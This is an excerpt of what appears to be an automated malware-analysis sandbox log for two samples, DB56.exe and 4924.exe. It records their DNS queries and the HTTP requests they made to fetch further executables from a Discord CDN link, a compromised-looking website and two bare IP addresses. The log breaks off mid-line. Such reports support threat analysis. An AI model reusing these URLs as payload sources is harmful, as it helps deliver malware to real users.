                      Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknown DNS traffic detected: queries for: rcacademy.at
                      Source: global traffic HTTP traffic detected: GET /attachments/921473641538027521/921473810035793960/Vorticism.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: cdn.discordapp.com
                      Source: global traffic HTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: bastinscustomfab.com
                      Source: global traffic HTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: www.bastinscustomfab.com Cookie: PHPSESSID=905f1348cca402f214daeb63de69114c
                      Source: global traffic HTTP traffic detected: GET /Igno.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 45.9.20.240:7769
                      Source: global traffic HTTP traffic detected: GET /install3.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 185.112.83.8
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 18 Dec 2021 14:32:14 GMT Server: Apache X-Powered-By: PHP/7.3.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.bastinscustomfab.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
                      Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.240
                      Source: unknown